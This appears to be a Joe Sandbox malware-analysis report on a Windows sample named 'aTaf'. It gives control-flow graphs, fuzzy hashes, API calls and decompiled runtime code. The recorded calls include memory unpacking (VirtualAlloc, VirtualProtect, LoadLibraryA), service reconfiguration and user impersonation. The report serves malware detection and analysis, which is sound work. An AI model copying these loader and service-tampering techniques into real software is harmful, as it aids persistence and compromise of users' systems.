                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                              • LockResource.KERNEL32(00000000), ref: 00401EA7
                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                              • _malloc.LIBCMT ref: 00401EBA
                              • _memset.LIBCMT ref: 00401EDD
                              • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                              • API String ID: 1430744539-2962942730
                              • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                              • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                              • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                              • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 256 50092b-500970 GetPEB 257 500972-500978 256->257 258 50097a-50098a call 500d35 257->258 259 50098c-50098e 257->259 258->259 264 500992-500994 258->264 259->257 261 500990 259->261 263 500996-500998 261->263 265 500a3b-500a3e 263->265 264->263 266 50099d-5009d3 264->266 267 5009dc-5009ee call 500d0c 266->267 270 5009f0-500a3a 267->270 271 5009d5-5009d8 267->271 270->265 271->267
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .$GetProcAddress.$l
                              • API String ID: 0-2784972518
                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                              • Instruction ID: c82c370464328a4a26a1431275042aa0e07294963062ef4ecf674b9c31d5cdc2
                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                              • Instruction Fuzzy Hash: 74318AB6900609DFDB10CF99C880BAEBBF9FF48324F24544AD841A7391D771EA45CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 279 22fa1a8-22fa232 281 22fa26b-22fa28d 279->281 282 22fa234-22fa23e 279->282 287 22fa28f-22fa29c 281->287 288 22fa2c9-22fa2ea 281->288 282->281 283 22fa240-22fa242 282->283 285 22fa265-22fa268 283->285 286 22fa244-22fa24e 283->286 285->281 289 22fa252-22fa261 286->289 290 22fa250 286->290 287->288 292 22fa29e-22fa2a0 287->292 296 22fa2ec-22fa2f6 288->296 297 22fa323-22fa345 288->297 289->289 291 22fa263 289->291 290->289 291->285 293 22fa2c3-22fa2c6 292->293 294 22fa2a2-22fa2ac 292->294 293->288 298 22fa2ae 294->298 299 22fa2b0-22fa2bf 294->299 296->297 300 22fa2f8-22fa2fa 296->300 307 22fa347-22fa354 297->307 308 22fa381-22fa3a2 297->308 298->299 299->299 301 22fa2c1 299->301 302 22fa31d-22fa320 300->302 303 22fa2fc-22fa306 300->303 301->293 302->297 305 22fa30a-22fa319 303->305 306 22fa308 303->306 305->305 309 22fa31b 305->309 306->305 307->308 310 22fa356-22fa358 307->310 314 22fa3db-22fa3fd 308->314 315 22fa3a4-22fa3ae 308->315 309->302 312 22fa37b-22fa37e 310->312 313 22fa35a-22fa364 310->313 312->308 316 22fa368-22fa377 313->316 317 22fa366 313->317 325 22fa3ff-22fa40c 314->325 326 22fa439-22fa4b0 ChangeServiceConfigA 314->326 315->314 318 22fa3b0-22fa3b2 315->318 316->316 319 22fa379 316->319 317->316 320 22fa3d5-22fa3d8 318->320 321 22fa3b4-22fa3be 318->321 319->312 320->314 323 22fa3c2-22fa3d1 321->323 324 22fa3c0 321->324 323->323 327 22fa3d3 323->327 324->323 325->326 328 22fa40e-22fa410 325->328 334 22fa4b9-22fa4f8 326->334 335 22fa4b2-22fa4b8 326->335 327->320 329 22fa433-22fa436 328->329 330 22fa412-22fa41c 328->330 329->326 332 22fa41e 330->332 333 22fa420-22fa42f 330->333 332->333 333->333 336 22fa431 333->336 339 22fa4fa-22fa4fe 334->339 340 22fa508-22fa50c 334->340 335->334 336->329 339->340 343 22fa500 339->343 341 22fa50e-22fa512 340->341 342 22fa51c-22fa520 340->342 341->342 344 22fa514 341->344 345 22fa522-22fa526 342->345 346 22fa530-22fa534 342->346 343->340 344->342 345->346 347 22fa528 
345->347 348 22fa536-22fa53a 346->348 349 22fa544-22fa548 346->349 347->346 348->349 350 22fa53c 348->350 351 22fa54a-22fa54e 349->351 352 22fa558-22fa55c 349->352 350->349 351->352 355 22fa550 351->355 353 22fa55e-22fa562 352->353 354 22fa56c 352->354 353->354 356 22fa564 353->356 355->352 356->354
                              APIs
                              • ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 022FA4A0
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: ChangeConfigService
                              • String ID:
                              • API String ID: 3849694230-0
                              • Opcode ID: 7ceb7e82ce3a90c172c93637bed3c43ef868969cb0dc1bccb4c2a236cbe38e31
                              • Instruction ID: 283c3130d921aa34266bd0c492cdbfc0b2e8a49d3b8516c479aa7ef35e374a2b
                              • Opcode Fuzzy Hash: 7ceb7e82ce3a90c172c93637bed3c43ef868969cb0dc1bccb4c2a236cbe38e31
                              • Instruction Fuzzy Hash: EDC13C71E2061A8FDB50CFE8C8857AEFBF1BB44314F148539E959E6288D7749885CF81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 357 22f96a8-22f970f 359 22f977e-22f9782 357->359 360 22f9711-22f9736 357->360 361 22f97c6-22f9804 GetUserNameA 359->361 362 22f9784-22f97c2 359->362 369 22f9738-22f973a 360->369 370 22f9766-22f976b 360->370 364 22f980d-22f9823 361->364 365 22f9806-22f980c 361->365 362->361 366 22f9839-22f9860 364->366 367 22f9825-22f9831 364->367 365->364 378 22f9862-22f9866 366->378 379 22f9870 366->379 367->366 373 22f975c-22f9764 369->373 374 22f973c-22f9746 369->374 375 22f976d-22f9779 370->375 373->375 381 22f974a-22f9758 374->381 382 22f9748 374->382 375->359 378->379 383 22f9868 378->383 381->381 384 22f975a 381->384 382->381 383->379 384->373
                              APIs
                              • GetUserNameA.ADVAPI32(00000000), ref: 022F97F4
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: NameUser
                              • String ID:
                              • API String ID: 2645101109-0
                              • Opcode ID: 4703883e0c702f337ada54d4dd1b9c7bf5e096f46dc06e9b78397ab670c49ffc
                              • Instruction ID: f7c6d622ec94a9f6ecdfc4e1027467948d1645167f302384a637f530ddeec72e
                              • Opcode Fuzzy Hash: 4703883e0c702f337ada54d4dd1b9c7bf5e096f46dc06e9b78397ab670c49ffc
                              • Instruction Fuzzy Hash: 115124B4D102098FDB18CFA9C994BDEFBF5AF48304F248429E816AB395D7749885CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 152 50003c-500047 153 500049 152->153 154 50004c-500263 call 500a3f call 500e0f call 500d90 VirtualAlloc 152->154 153->154 169 500265-500289 call 500a69 154->169 170 50028b-500292 154->170 175 5002ce-5003c2 VirtualProtect call 500cce call 500ce7 169->175 172 5002a1-5002b0 170->172 174 5002b2-5002cc 172->174 172->175 174->172 181 5003d1-5003e0 175->181 182 5003e2-500437 call 500ce7 181->182 183 500439-5004b8 VirtualFree 181->183 182->181 185 5005f4-5005fe 183->185 186 5004be-5004cd 183->186 189 500604-50060d 185->189 190 50077f-500789 185->190 188 5004d3-5004dd 186->188 188->185 192 5004e3-500505 188->192 189->190 195 500613-500637 189->195 193 5007a6-5007b0 190->193 194 50078b-5007a3 190->194 203 500517-500520 192->203 204 500507-500515 192->204 196 5007b6-5007cb 193->196 197 50086e-5008be LoadLibraryA 193->197 194->193 198 50063e-500648 195->198 200 5007d2-5007d5 196->200 202 5008c7-5008f9 197->202 198->190 201 50064e-50065a 198->201 205 500824-500833 200->205 206 5007d7-5007e0 200->206 201->190 207 500660-50066a 201->207 209 500902-50091d 202->209 210 5008fb-500901 202->210 211 500526-500547 203->211 204->211 208 500839-50083c 205->208 212 5007e2 206->212 213 5007e4-500822 206->213 214 50067a-500689 207->214 208->197 215 50083e-500847 208->215 210->209 218 50054d-500550 211->218 212->205 213->200 216 500750-50077a 214->216 217 50068f-5006b2 214->217 219 500849 215->219 220 50084b-50086c 215->220 216->198 221 5006b4-5006ed 217->221 222 5006ef-5006fc 217->222 224 5005e0-5005ef 218->224 225 500556-50056b 218->225 219->197 220->208 221->222 226 50074b 222->226 227 5006fe-500748 222->227 224->188 228 50056d 225->228 229 50056f-50057a 225->229 226->214 227->226 228->224 230 50059b-5005bb 229->230 231 50057c-500599 229->231 236 5005bd-5005db 230->236 231->236 236->218
                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0050024D
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocVirtual
                              • String ID: cess$kernel32.dll
                              • API String ID: 4275171209-1230238691
                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                              • Instruction ID: 2a9954c425b5c615df3655688d6329589181e04494bf30fe7994701720054a9d
                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                              • Instruction Fuzzy Hash: 2E526974A01229DFDB64CF58C985BACBBB1BF09304F1480D9E94DAB291DB30AE95DF14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 237 40af66-40af6e 238 40af7d-40af88 call 40b84d 237->238 241 40af70-40af7b call 40d2e3 238->241 242 40af8a-40af8b 238->242 241->238 245 40af8c-40af98 241->245 246 40afb3-40afca call 40af49 call 40cd39 245->246 247 40af9a-40afb2 call 40aefc call 40d2bd 245->247 247->246
                              C-Code - Quality: 63%
                              			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                              				signed int _v4;
                              				signed int _v16;
                              				signed int _v40;
                              				void* _t14;
                              				signed int _t15;
                              				intOrPtr* _t21;
                              				signed int _t24;
                              				void* _t28;
                              				void* _t39;
                              				void* _t40;
                              				signed int _t42;
                              				void* _t45;
                              				void* _t47;
                              				void* _t51;
                              
                              				_t40 = __edi;
                              				_t28 = __ebx;
                              				_t45 = _t51;
                              				while(1) {
                              					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                              					if(_t14 != 0) {
                              						break;
                              					}
                              					_t15 = E0040D2E3(_a4);
                              					__eflags = _t15;
                              					if(_t15 == 0) {
                              						__eflags =  *0x423490 & 0x00000001;
                              						if(( *0x423490 & 0x00000001) == 0) {
                              							 *0x423490 =  *0x423490 | 0x00000001;
                              							__eflags =  *0x423490;
                              							E0040AEFC(0x423484);
                              							E0040D2BD( *0x423490, 0x41a704);
                              						}
                              						E0040AF49( &_v16, 0x423484);
                              						E0040CD39( &_v16, 0x420fa4);
                              						asm("int3");
                              						_t47 = _t45;
                              						_push(_t47);
                              						_push(0xc);
                              						_push(0x420ff8);
                              						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                              						_t42 = _v4;
                              						__eflags = _t42;
                              						if(_t42 != 0) {
                              							__eflags =  *0x4250b0 - 3;
                              							if( *0x4250b0 != 3) {
                              								_push(_t42);
                              								goto L16;
                              							} else {
                              								E0040D6E0(_t28, 4);
                              								_v16 = _v16 & 0x00000000;
                              								_t24 = E0040D713(_t42);
                              								_v40 = _t24;
                              								__eflags = _t24;
                              								if(_t24 != 0) {
                              									_push(_t42);
                              									_push(_t24);
                              									E0040D743();
                              								}
                              								_v16 = 0xfffffffe;
                              								_t19 = E0040B70B();
                              								__eflags = _v40;
                              								if(_v40 == 0) {
                              									_push(_v4);
                              									L16:
                              									__eflags = HeapFree( *0x4234b4, 0, ??);
                              									if(__eflags == 0) {
                              										_t21 = E0040BFC1(__eflags);
                              										 *_t21 = E0040BF7F(GetLastError());
                              									}
                              								}
                              							}
                              						}
                              						return E0040E21D(_t19);
                              					} else {
                              						continue;
                              					}
                              					L19:
                              				}
                              				return _t14;
                              				goto L19;
                              			}


















                              APIs
                              • _malloc.LIBCMT ref: 0040AF80
                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                              • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                              • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                              • String ID:
                              • API String ID: 1411284514-0
                              • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                              • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                              • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                              • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 273 500e0f-500e24 SetErrorMode * 2 274 500e26 273->274 275 500e2b-500e2c 273->275 274->275
                              APIs
                              • SetErrorMode.KERNELBASE(00000400,?,?,00500223,?,?), ref: 00500E19
                              • SetErrorMode.KERNELBASE(00000000,?,?,00500223,?,?), ref: 00500E1E
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorMode
                              • String ID:
                              • API String ID: 2340568224-0
                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                              • Instruction ID: 0d446c16eae7c208faf0d57bd6344f7191849366e1e2b515b91accd1c8e4ec86
                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                              • Instruction Fuzzy Hash: C6D0123114512877D7002A94DC09BCD7F1CDF05B62F008411FB0DE90C0C770994046E5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 276 40e7ee-40e7f6 call 40e7c3 278 40e7fb-40e7ff ExitProcess 276->278
                              C-Code - Quality: 100%
                              			E0040E7EE(int _a4) {
                              
                              				E0040E7C3(_a4); // executed
                              				ExitProcess(_a4);
                              			}




                              APIs
                              • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                              • ExitProcess.KERNEL32 ref: 0040E7FF
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                              • String ID:
                              • API String ID: 2427264223-0
                              • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                              • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                              • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                              • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 387 22f99e8-22f9a49 389 22f9a4b-22f9a55 387->389 390 22f9a82-22f9ad2 OpenServiceA 387->390 389->390 391 22f9a57-22f9a59 389->391 397 22f9adb-22f9b0c 390->397 398 22f9ad4-22f9ada 390->398 393 22f9a7c-22f9a7f 391->393 394 22f9a5b-22f9a65 391->394 393->390 395 22f9a69-22f9a78 394->395 396 22f9a67 394->396 395->395 399 22f9a7a 395->399 396->395 402 22f9b0e-22f9b12 397->402 403 22f9b1c 397->403 398->397 399->393 402->403 404 22f9b14 402->404 404->403
                              APIs
                              • OpenServiceA.ADVAPI32(?,?,?), ref: 022F9AC2
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: OpenService
                              • String ID:
                              • API String ID: 3098006287-0
                              • Opcode ID: 95cdbf281f1a643bbea0c1ff3e0810226eced42d0f9ca628c61b2f4293878a18
                              • Instruction ID: bb2dd55246d2f8b476ca66f4c4dbc0f175ff4488b9934b0ea1ca1c8d95e223cd
                              • Opcode Fuzzy Hash: 95cdbf281f1a643bbea0c1ff3e0810226eced42d0f9ca628c61b2f4293878a18
                              • Instruction Fuzzy Hash: 283132B0D102199FDB10CFE9C884B9EFBF5BB48314F14812AE815A7248D7789885CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 405 22f9920-22f996f 407 22f9977-22f997b 405->407 408 22f9971-22f9974 405->408 409 22f997d-22f9980 407->409 410 22f9983-22f99b2 OpenSCManagerW 407->410 408->407 409->410 411 22f99bb-22f99cf 410->411 412 22f99b4-22f99ba 410->412 412->411
                              APIs
                              • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 022F99A5
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: cdaf4637bface5b7436daa9873eacd637221d33d6b779e8cba42038f9dac4fa5
                              • Instruction ID: 9cdff2e3e42cc895c7be68538378d3da14931770867b585d0f0699f7abe6a901
                              • Opcode Fuzzy Hash: cdaf4637bface5b7436daa9873eacd637221d33d6b779e8cba42038f9dac4fa5
                              • Instruction Fuzzy Hash: B42115B5C002199FCB50CF9AD984BDEFBF4FB88314F15816AE908BB244D775A540CBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 414 22f9180-22f9201 VirtualProtect 417 22f920a-22f922f 414->417 418 22f9203-22f9209 414->418 418->417
                              APIs
                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 022F91F4
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 799dba91e6ca2a22f2532690aca021bd556d31e729e51bb57e4768510e4cdfbe
                              • Instruction ID: 4b9939355373e5205ac058f041731b36d06cb7c7fa2f67ae139b1ffe3b6b810f
                              • Opcode Fuzzy Hash: 799dba91e6ca2a22f2532690aca021bd556d31e729e51bb57e4768510e4cdfbe
                              • Instruction Fuzzy Hash: 9511F7B1D002099BCB10DFAAC984BEFFBF9EF58314F50842AD419A7250C778A945CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 422 22fa0e8-22fa165 ControlService 424 22fa16e-22fa18f 422->424 425 22fa167-22fa16d 422->425 425->424
                              APIs
                              • ControlService.ADVAPI32(?,?,?), ref: 022FA158
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: ControlService
                              • String ID:
                              • API String ID: 253159669-0
                              • Opcode ID: 20e7b676af57ffd6670d1a24cc60241aa931d4066c54d213e8e1417adf0a0698
                              • Instruction ID: cc33c7162db6ddd7bfb2199bdc2b350db380af0dbf63716dbc88c086208421b0
                              • Opcode Fuzzy Hash: 20e7b676af57ffd6670d1a24cc60241aa931d4066c54d213e8e1417adf0a0698
                              • Instruction Fuzzy Hash: 6011E4B19006099FDB10CF9AC584BDFFBF8EB48324F50816AE558A3750D378A945CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 427 22f9ed8-22f9f44 ImpersonateLoggedOnUser 429 22f9f4d-22f9f6e 427->429 430 22f9f46-22f9f4c 427->430 430->429
                              APIs
                              • ImpersonateLoggedOnUser.KERNELBASE ref: 022F9F37
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: ImpersonateLoggedUser
                              • String ID:
                              • API String ID: 2216092060-0
                              • Opcode ID: 543a55c3990f7f53da39911fd6fd81f162f6cb0ff982c96f881036981d7c7038
                              • Instruction ID: 1d87705fe10f25e2b9e48beb3a9193cd581d7e85b3837cdbebbc3a7755be38c6
                              • Opcode Fuzzy Hash: 543a55c3990f7f53da39911fd6fd81f162f6cb0ff982c96f881036981d7c7038
                              • Instruction Fuzzy Hash: FC1106B1900659CFDB10CF9AC584BDEFBF8EB48324F10846AD558A3640D778A985CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 432 40d534-40d556 HeapCreate 433 40d558-40d559 432->433 434 40d55a-40d563 432->434
                              C-Code - Quality: 100%
                              			E0040D534(intOrPtr _a4) {
                              				void* _t6;
                              
                              				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                              				 *0x4234b4 = _t6;
                              				if(_t6 != 0) {
                              					 *0x4250b0 = 1;
                              					return 1;
                              				} else {
                              					return _t6;
                              				}
                              			}





                              APIs
                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                              • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                              • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                              • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 435 40ea0a-40ea16 call 40e8de 437 40ea1b-40ea1f 435->437
                              C-Code - Quality: 25%
                              			E0040EA0A(intOrPtr _a4) {
                              				void* __ebp;
                              				void* _t2;
                              				void* _t3;
                              				void* _t4;
                              				void* _t5;
                              				void* _t8;
                              
                              				_push(0);
                              				_push(0);
                              				_push(_a4);
                              				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                              				return _t2;
                              			}










                              APIs
                              • _doexit.LIBCMT ref: 0040EA16
                                • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __decode_pointer$__initterm$__lock_doexit
                              • String ID:
                              • API String ID: 1597249276-0
                              • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                              • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                              • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                              • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00500929
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
